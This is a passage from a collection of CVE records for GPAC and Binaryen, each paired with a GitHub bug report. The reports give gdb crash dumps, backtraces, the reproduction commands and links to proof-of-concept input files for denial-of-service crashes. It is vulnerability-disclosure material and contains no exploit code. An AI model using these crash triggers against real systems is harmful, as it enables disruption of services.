0x7ffff77718e6 <gf_fileio_check+54>: jne 0x7ffff77718f8 <gf_fileio_check+72> 0x7ffff77718e8 <gf_fileio_check+56>: xor eax,eax 0x7ffff77718ea <gf_fileio_check+58>: cmp QWORD PTR [rdi+0x8],rdi [------------------------------------stack-------------------------------------] 0000| 0x7fffffff7fa8 --> 0x7ffff777227c (<gf_fseek+28>: test eax,eax) 0008| 0x7fffffff7fb0 --> 0x8a8000032c4 0016| 0x7fffffff7fb8 --> 0x0 0024| 0x7fffffff7fc0 --> 0x7fffffff84a0 --> 0x8a8 0032| 0x7fffffff7fc8 --> 0x7ffff77767f4 (<gf_bs_seek+452>: mov QWORD PTR [rbx+0x18],rbp) 0040| 0x7fffffff7fd0 --> 0x5555555daa30 --> 0x0 0048| 0x7fffffff7fd8 --> 0x5555555db320 --> 0x5dfd555e1548 0056| 0x7fffffff7fe0 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff77718e2 in gf_fileio_check () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 gdb-peda$ bt #0 0x00007ffff77718e2 in gf_fileio_check () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #1 0x00007ffff777227c in gf_fseek () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #2 0x00007ffff77767f4 in gf_bs_seek () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #3 0x00007ffff7910c98 in inplace_shift_mdat () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #4 0x00007ffff791549c in WriteToFile () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #5 0x00007ffff7906432 in gf_isom_write () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #6 0x00007ffff79064b8 in gf_isom_close () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #7 0x000055555557bd12 in mp4boxMain () #8 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x4, argv=0x7fffffffe338, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe328) at ../csu/libc-start.c:308 #9 0x000055555556d45e in _start () ```

Untrusted pointer dereference in gf_fileio_check()

https://api.github.com/repos/gpac/gpac/issues/2013/comments

2021-12-24T07:13:51Z

2022-01-03T11:25:17Z

https://github.com/gpac/gpac/issues/2013

CVE-2021-46050

2022-01-10T14:11:18.467

A Stack Overflow vulnerability exists in Binaryen 103 via the printf_common function.

https://github.com/WebAssembly/binaryen/issues/4391

github.com

**Version:** ``` version_103 ``` **System information** **command:** ``` ./bin/wasm-ctor-eval POC4 ``` [POC4.zip](https://github.com/WebAssembly/binaryen/files/7711678/POC4.zip) **Result** ``` 1887835 segmentation fault ./bin/wasm-ctor-eval ``` **GDB information** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0xfbad8001 RBX: 0x0 RCX: 0x0 RDX: 0x7fffff7ff490 --> 0x3000000020 (' ') RSI: 0x7ffff7df5092 --> 0x6d73617700756c25 ('%lu') RDI: 0x7fffff7ff2e0 --> 0x7ffffbad8001 RBP: 0x7fffff7ff2c0 --> 0x7fffff7ff460 --> 0x0 RSP: 0x7fffff7fed50 RIP: 0x7ffff6f16a01 (<__vfprintf_internal+33>: mov DWORD PTR [rbp-0x4c0],ecx) R8 : 0x0 R9 : 0x7fffff7ff3d0 --> 0x0 R10: 0x7ffff6f2c180 (<___vsnprintf>: endbr64) R11: 0x7ffff7088be0 --> 0x555555800a40 --> 0x6201f248 R12: 0x7fffff7ff2e0 --> 0x7ffffbad8001 R13: 0x7ffff7df5092 --> 0x6d73617700756c25 ('%lu') R14: 0x7fffff7ff490 --> 0x3000000020 (' ') R15: 0x7fffff7ff490 --> 0x3000000020 (' ') EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff6f169f6 <__vfprintf_internal+22>: mov r12,rdi 0x7ffff6f169f9 <__vfprintf_internal+25>: push rbx 0x7ffff6f169fa <__vfprintf_internal+26>: sub rsp,0x548 => 0x7ffff6f16a01 <__vfprintf_internal+33>: mov DWORD PTR [rbp-0x4c0],ecx 0x7ffff6f16a07 <__vfprintf_internal+39>: mov rax,QWORD PTR fs:0x28 0x7ffff6f16a10 <__vfprintf_internal+48>: mov QWORD PTR [rbp-0x38],rax 0x7ffff6f16a14 <__vfprintf_internal+52>: xor eax,eax 0x7ffff6f16a16 <__vfprintf_internal+54>: mov rax,QWORD PTR [rip+0x171453] # 0x7ffff7087e70 [------------------------------------stack-------------------------------------] Invalid $SP address: 0x7fffff7fed50 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff6f16a01 in __vfprintf_internal (s=s@entry=0x7fffff7ff2e0, format=format@entry=0x7ffff7df5092 "%lu", ap=ap@entry=0x7fffff7ff490, mode_flags=mode_flags@entry=0x0) at vfprintf-internal.c:1289 1289 vfprintf-internal.c: No such file or directory. gdb-peda$ bt 20 #0 0x00007ffff6f16a01 in __vfprintf_internal (s=s@entry=0x7fffff7ff2e0, format=format@entry=0x7ffff7df5092 "%lu", ap=ap@entry=0x7fffff7ff490, mode_flags=mode_flags@entry=0x0) at vfprintf-internal.c:1289 #1 0x00007ffff6f2c11a in __vsnprintf_internal (string=0x7fffff7ff460 "", maxlen=<optimized out>, format=0x7ffff7df5092 "%lu", args=0x7fffff7ff490, mode_flags=0x0) at vsnprintf.c:114 #2 0x000055555557737f in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > __gnu_cxx::__to_xstring<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char>(int (*)(char*, unsigned long, char const*, __va_list_tag*), unsigned long, char const*, ...) () #3 0x00007ffff7c00030 in wasm::WasmBinaryBuilder::getNextLabel() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #4 0x00007ffff7c0eeef in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #5 0x00007ffff7c08d57 in wasm::WasmBinaryBuilder::visitTryOrTryInBlock(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #6 0x00007ffff7c0a2c7 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #7 0x00007ffff7c0b13e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #8 0x00007ffff7c0ef20 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #9 0x00007ffff7c08d57 in wasm::WasmBinaryBuilder::visitTryOrTryInBlock(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #10 0x00007ffff7c0a2c7 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #11 0x00007ffff7c0b13e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #12 0x00007ffff7c0ef20 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #13 0x00007ffff7c08d57 in wasm::WasmBinaryBuilder::visitTryOrTryInBlock(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #14 0x00007ffff7c0a2c7 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #15 0x00007ffff7c0b13e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #16 0x00007ffff7c0ef20 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #17 0x00007ffff7c08d57 in wasm::WasmBinaryBuilder::visitTryOrTryInBlock(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #18 0x00007ffff7c0a2c7 in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #19 0x00007ffff7c0b13e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so (More stack frames follow...) gdb-peda$ ```

A stack-overflow in printf_common()

https://api.github.com/repos/WebAssembly/binaryen/issues/4391/comments

2021-12-14T12:41:56Z

2021-12-25T06:34:51Z

https://github.com/WebAssembly/binaryen/issues/4391

CVE-2021-46051

2022-01-10T14:11:19.437

A Pointer Dereference Vulnerability exists in GPAC 1.0.1 via the Media_IsSelfContained function, which could cause a Denial of Service. .

https://github.com/gpac/gpac/issues/2011

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC11 ``` [POC11.zip](https://github.com/gpac/gpac/files/7772906/POC11.zip) **Result** ``` Segmentation fault ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x5569555dfdc4 RBX: 0x1 RCX: 0x5555555e18c0 --> 0x3712 RDX: 0x4015 RSI: 0x1 RDI: 0x5555555e2840 --> 0x146d646975 RBP: 0x5555555e2840 --> 0x146d646975 RSP: 0x7fffffff7f70 --> 0x5555555e0e14 --> 0x4017 RIP: 0x7ffff79286ca (<Media_IsSelfContained+26>: mov rax,QWORD PTR [rax+0x30]) R8 : 0x5555555e18c0 --> 0x3712 R9 : 0x7fffffff7f00 --> 0x2 R10: 0x7ffff76d927a ("gf_isom_box_size") R11: 0x7ffff76a0be0 --> 0x5555555e8770 --> 0x5555555e18d4 --> 0x640204c700000000 R12: 0x14 R13: 0x5555555e05c0 --> 0x73747363 ('csts') R14: 0x5555555e8740 --> 0x636f3648 ('H6oc') R15: 0x1 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff79286c3 <Media_IsSelfContained+19>: push rbx 0x7ffff79286c4 <Media_IsSelfContained+20>: mov rax,QWORD PTR [rdi+0x40] 0x7ffff79286c8 <Media_IsSelfContained+24>: mov ebx,esi => 0x7ffff79286ca <Media_IsSelfContained+26>: mov rax,QWORD PTR [rax+0x30] 0x7ffff79286ce <Media_IsSelfContained+30>: mov r12,QWORD PTR [rax+0x48] 0x7ffff79286d2 <Media_IsSelfContained+34>: test esi,esi 0x7ffff79286d4 <Media_IsSelfContained+36>: je 0x7ffff7928780 <Media_IsSelfContained+208> 0x7ffff79286da <Media_IsSelfContained+42>: test r12,r12 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff7f70 --> 0x5555555e0e14 --> 0x4017 0008| 0x7fffffff7f78 --> 0x5555555e8740 --> 0x636f3648 ('H6oc') 0016| 0x7fffffff7f80 --> 0x14 0024| 0x7fffffff7f88 --> 0x7ffff790ffcb (<shift_chunk_offsets.part.0+75>: test eax,eax) 0032| 0x7fffffff7f90 --> 0x5555555e2840 --> 0x146d646975 0040| 0x7fffffff7f98 --> 0x5555555e05c0 --> 0x73747363 ('csts') 0048| 0x7fffffff7fa0 --> 0x0 0056| 0x7fffffff7fa8 --> 0x7fffffff7ff0 --> 0x5555555e8740 --> 0x636f3648 ('H6oc') [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff79286ca in Media_IsSelfContained () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 gdb-peda$ bt #0 0x00007ffff79286ca in Media_IsSelfContained () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #1 0x00007ffff790ffcb in shift_chunk_offsets.part () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #2 0x00007ffff79103a7 in inplace_shift_moov_meta_offsets () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #3 0x00007ffff7910e3c in inplace_shift_mdat () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #4 0x00007ffff7915009 in WriteToFile () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #5 0x00007ffff7906432 in gf_isom_write () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #6 0x00007ffff79064b8 in gf_isom_close () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #7 0x000055555557bd12 in mp4boxMain () #8 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x3, argv=0x7fffffffe388, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe378) at ../csu/libc-start.c:308 #9 0x000055555556d45e in _start () ```

Untrusted pointer dereference in Media_IsSelfContained ()

https://api.github.com/repos/gpac/gpac/issues/2011/comments

2021-12-24T06:14:20Z

2022-01-03T11:25:05Z

https://github.com/gpac/gpac/issues/2011

CVE-2021-46052

2022-01-10T14:11:20.443

A Denial of Service vulnerability exists in Binaryen 104 due to an assertion abort in wasm::Tuple::validate.

https://github.com/WebAssembly/binaryen/issues/4411

github.com

**Version:** ``` version_104 ``` **command:** ``` wasm-as POC6 ``` [POC6.zip](https://github.com/WebAssembly/binaryen/files/7775594/POC6.zip) **Result** ``` Aborted. ``` **bt** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff4416040 (0x00007ffff4416040) RCX: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffb0d0 --> 0x0 RDI: 0x2 RBP: 0x7ffff45d5588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n") RSP: 0x7fffffffb0d0 --> 0x0 RIP: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffb0d0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffff799e2e0 ("/home/zxq/CVE_testing/project/binaryen/src/wasm-type.h") R13: 0x1c6 R14: 0x7ffff79a2ce0 ("type.isSingle()") R15: 0x60300000e090 --> 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff446017f <__GI_raise+191>: mov edi,0x2 0x7ffff4460184 <__GI_raise+196>: mov eax,0xe 0x7ffff4460189 <__GI_raise+201>: syscall => 0x7ffff446018b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff4460193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff446019c <__GI_raise+220>: jne 0x7ffff44601c4 <__GI_raise+260> 0x7ffff446019e <__GI_raise+222>: mov eax,r8d 0x7ffff44601a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffb0d0 --> 0x0 0008| 0x7fffffffb0d8 --> 0x49cbd0 (<free>: push rbp) 0016| 0x7fffffffb0e0 --> 0xfbad8000 --> 0x0 0024| 0x7fffffffb0e8 --> 0x6120000001c0 --> 0x3a73612d24800005 0032| 0x7fffffffb0f0 --> 0x612000000225 ("sertion `type.isSingle()' failed.\n") 0040| 0x7fffffffb0f8 --> 0x6120000001c0 --> 0x3a73612d24800005 0048| 0x7fffffffb100 --> 0x6120000001c0 --> 0x3a73612d24800005 0056| 0x7fffffffb108 --> 0x612000000247 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff443f859 in __GI_abort () at abort.c:79 #2 0x00007ffff443f729 in __assert_fail_base (fmt=0x7ffff45d5588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x7ffff79a2ce0 <str> "type.isSingle()", file=0x7ffff799e2e0 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm-type.h", line=0x1c6, function=<optimized out>) at assert.c:92 #3 0x00007ffff4450f36 in __GI___assert_fail (assertion=0x7ffff79a2ce0 <str> "type.isSingle()", file=0x7ffff799e2e0 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm-type.h", line=0x1c6, function=0x7ffff79a2d20 <__PRETTY_FUNCTION__._ZN4wasm5Tuple8validateEv> "void wasm::Tuple::validate()") at assert.c:101 #4 0x00007ffff520ff7c in wasm::Tuple::validate (this=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/wasm-type.h:454 #5 0x00007ffff7087705 in wasm::Tuple::Tuple (this=0x7fffffffb660, types=std::vector of length 3, capacity 3 = {...}) at /home/zxq/CVE_testing/project/binaryen/src/wasm-type.h:437 #6 wasm::SExpressionWasmBuilder::parseTypeUse (this=<optimized out>, s=..., startPos=<optimized out>, functionType=..., namedParams=...) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-s-parser.cpp:637 #7 0x00007ffff70890bc in wasm::SExpressionWasmBuilder::parseTypeUse (this=0x7fffffffda40, s=..., startPos=0x4, functionType=...) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-s-parser.cpp:679 #8 0x00007ffff705de99 in wasm::SExpressionWasmBuilder::parseImport (this=<optimized out>, s=...) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-s-parser.cpp:3191 #9 0x00007ffff705adb3 in wasm::SExpressionWasmBuilder::preParseImports (this=<optimized out>, curr=...) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-s-parser.cpp:406 #10 0x00007ffff7056441 in wasm::SExpressionWasmBuilder::SExpressionWasmBuilder (this=<optimized out>, wasm=..., module=..., profile=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-s-parser.cpp:380 #11 0x00000000004d2a80 in main (argc=<optimized out>, argv=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/tools/wasm-as.cpp:113 #12 0x00007ffff44410b3 in __libc_start_main (main=0x4cef20 <main(int, char const**)>, argc=0x2, argv=0x7fffffffe268, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe258) at ../csu/libc-start.c:308 #13 0x000000000042478e in _start () at /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/iostream:7 ```

A abort failure in wasm::Tuple::validate ()

https://api.github.com/repos/WebAssembly/binaryen/issues/4411/comments

2021-12-25T07:43:44Z

2022-01-05T01:17:33Z

https://github.com/WebAssembly/binaryen/issues/4411

CVE-2021-46053

2022-01-10T14:11:21.647

A Denial of Service vulnerability exists in Binaryen 103. The program terminates with signal SIGKILL.

https://github.com/WebAssembly/binaryen/issues/4392

github.com

**Version:** ``` version_103 ``` **System information** **command:** ``` ./bin/wasm-ctor-eval POC5 ``` [POC5.zip](https://github.com/WebAssembly/binaryen/files/7711740/POC5.zip) **Result** ``` Program terminated with signal SIGKILL, Killed. ```

Program terminated with signal SIGKILL, Killed.

https://api.github.com/repos/WebAssembly/binaryen/issues/4392/comments

2021-12-14T12:53:22Z

2021-12-14T15:54:57Z

https://github.com/WebAssembly/binaryen/issues/4392

CVE-2021-46054

2022-01-10T14:11:22.437

A Denial of Service vulnerability exists in Binaryen 104 due to an assertion abort in wasm::WasmBinaryBuilder::visitRethrow(wasm::Rethrow*).

https://github.com/WebAssembly/binaryen/issues/4410

github.com

**Version:** ``` version_104 ``` **command:** ``` ./bin/wasm-ctor-eval POC5 ``` [POC5.zip](https://github.com/WebAssembly/binaryen/files/7775566/POC5.zip) **Result** ``` 76703 abort ``` **bt** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff6d47fc0 (0x00007ffff6d47fc0) RCX: 0x7ffff6ee118b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffcbe0 --> 0x0 RDI: 0x2 RBP: 0x7ffff7056588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n") RSP: 0x7fffffffcbe0 --> 0x0 RIP: 0x7ffff6ee118b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffcbe0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffff7e4e3d8 ("/home/zxq/CVE_testing/source/binaryen/src/wasm/wasm-binary.cpp") R13: 0x1964 R14: 0x7ffff7e4f588 ("curr->target != DELEGATE_CALLER_TARGET") R15: 0x5555555f7030 --> 0x30246c6562616c ('label$0') EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff6ee117f <__GI_raise+191>: mov edi,0x2 0x7ffff6ee1184 <__GI_raise+196>: mov eax,0xe 0x7ffff6ee1189 <__GI_raise+201>: syscall => 0x7ffff6ee118b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff6ee1193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff6ee119c <__GI_raise+220>: jne 0x7ffff6ee11c4 <__GI_raise+260> 0x7ffff6ee119e <__GI_raise+222>: mov eax,r8d 0x7ffff6ee11a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffcbe0 --> 0x0 0008| 0x7fffffffcbe8 --> 0x7ffff6f38850 (<__GI___libc_free>: endbr64) 0016| 0x7fffffffcbf0 --> 0x7ffffbad8000 0024| 0x7fffffffcbf8 --> 0x5555555e7920 --> 0x0 0032| 0x7fffffffcc00 --> 0x5555555e7985 ("inaryBuilder::visitRethrow(wasm::Rethrow*): Assertion `curr->target != DELEGATE_CALLER_TARGET' failed.\n") 0040| 0x7fffffffcc08 --> 0x5555555e7920 --> 0x0 0048| 0x7fffffffcc10 --> 0x5555555e7920 --> 0x0 0056| 0x7fffffffcc18 --> 0x5555555e79ec --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff6ec0859 in __GI_abort () at abort.c:79 #2 0x00007ffff6ec0729 in __assert_fail_base (fmt=0x7ffff7056588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x7ffff7e4f588 "curr->target != DELEGATE_CALLER_TARGET", file=0x7ffff7e4e3d8 "/home/zxq/CVE_testing/source/binaryen/src/wasm/wasm-binary.cpp", line=0x1964, function=<optimized out>) at assert.c:92 #3 0x00007ffff6ed1f36 in __GI___assert_fail (assertion=0x7ffff7e4f588 "curr->target != DELEGATE_CALLER_TARGET", file=0x7ffff7e4e3d8 "/home/zxq/CVE_testing/source/binaryen/src/wasm/wasm-binary.cpp", line=0x1964, function=0x7ffff7e4f548 "void wasm::WasmBinaryBuilder::visitRethrow(wasm::Rethrow*)") at assert.c:101 #4 0x00007ffff7c09ca1 in wasm::WasmBinaryBuilder::visitRethrow(wasm::Rethrow*) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #5 0x00007ffff7c0b48c in wasm::WasmBinaryBuilder::readExpression(wasm::Expression*&) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #6 0x00007ffff7c0c17e in wasm::WasmBinaryBuilder::processExpressions() () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #7 0x00007ffff7c0ff90 in wasm::WasmBinaryBuilder::getBlockOrSingleton(wasm::Type) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #8 0x00007ffff7c109bb in wasm::WasmBinaryBuilder::readFunctions() () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #9 0x00007ffff7c11f52 in wasm::WasmBinaryBuilder::read() () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #10 0x00007ffff7c3dec6 in wasm::ModuleReader::readBinaryData(std::vector<char, std::allocator<char> >&, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #11 0x00007ffff7c3e6cc in wasm::ModuleReader::readBinary(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #12 0x00007ffff7c3eda1 in wasm::ModuleReader::read(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, wasm::Module&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >) () from /home/zxq/CVE_testing/source/binaryen/build/bin/../lib/libbinaryen.so #13 0x000055555556943e in main () #14 0x00007ffff6ec20b3 in __libc_start_main (main=0x5555555688c0 <main>, argc=0x2, argv=0x7fffffffe338, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe328) at ../csu/libc-start.c:308 #15 0x0000555555569e5e in _start () ```

A abort failure in wasm::WasmBinaryBuilder::visitRethrow(wasm::Rethrow*)

https://api.github.com/repos/WebAssembly/binaryen/issues/4410/comments

2021-12-25T07:10:11Z

2024-07-25T18:07:07Z

https://github.com/WebAssembly/binaryen/issues/4410

CVE-2021-46055

2022-01-10T14:11:22.887

A Denial of Service vulnerability exists in Binaryen 104 due to an assertion abort in wasm::WasmBinaryBuilder::visitRethrow(wasm::Rethrow*).

https://github.com/WebAssembly/binaryen/issues/4413

github.com

**Version:** ``` version_104 ``` **command:** ``` wasm-dis POC8 ``` [POC8.zip](https://github.com/WebAssembly/binaryen/files/7775621/POC8.zip) **Result** ``` Aborted. ``` **bt** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff4416040 (0x00007ffff4416040) RCX: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffb890 --> 0x0 RDI: 0x2 RBP: 0x7ffff45d5588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n") RSP: 0x7fffffffb890 --> 0x0 RIP: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffb890 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffff799dc40 ("/home/zxq/CVE_testing/project/binaryen/src/wasm-builder.h") R13: 0x31 ('1') R14: 0x7ffff799dc00 ("type.isSignature()") R15: 0xfffff700 --> 0x0 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff446017f <__GI_raise+191>: mov edi,0x2 0x7ffff4460184 <__GI_raise+196>: mov eax,0xe 0x7ffff4460189 <__GI_raise+201>: syscall => 0x7ffff446018b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff4460193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff446019c <__GI_raise+220>: jne 0x7ffff44601c4 <__GI_raise+260> 0x7ffff446019e <__GI_raise+222>: mov eax,r8d 0x7ffff44601a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffb890 --> 0x0 0008| 0x7fffffffb898 --> 0x49bba0 (<free>: push rbp) 0016| 0x7fffffffb8a0 --> 0x7ffffbad8000 0024| 0x7fffffffb8a8 --> 0x6120000001c0 --> 0x7369642d69000001 0032| 0x7fffffffb8b0 